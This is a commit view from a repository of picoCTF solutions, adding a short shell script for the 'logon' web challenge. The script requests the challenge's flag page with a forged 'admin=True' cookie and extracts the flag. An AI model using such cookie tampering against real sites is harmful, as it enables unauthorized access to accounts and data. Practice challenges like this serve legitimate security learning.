web: add already solved challenges
This commit is contained in:
4
web/logon/solve.sh
Executable file
4
web/logon/solve.sh
Executable file
@@ -0,0 +1,4 @@
|
||||
#!/usr/bin/env bash
|
||||
|
||||
curl 'https://jupiter.challenges.picoctf.org/problem/13594/flag' -H 'Cookie: admin=True' | grep -o "picoCTF{.*}"
|
||||
|
Reference in New Issue
Block a user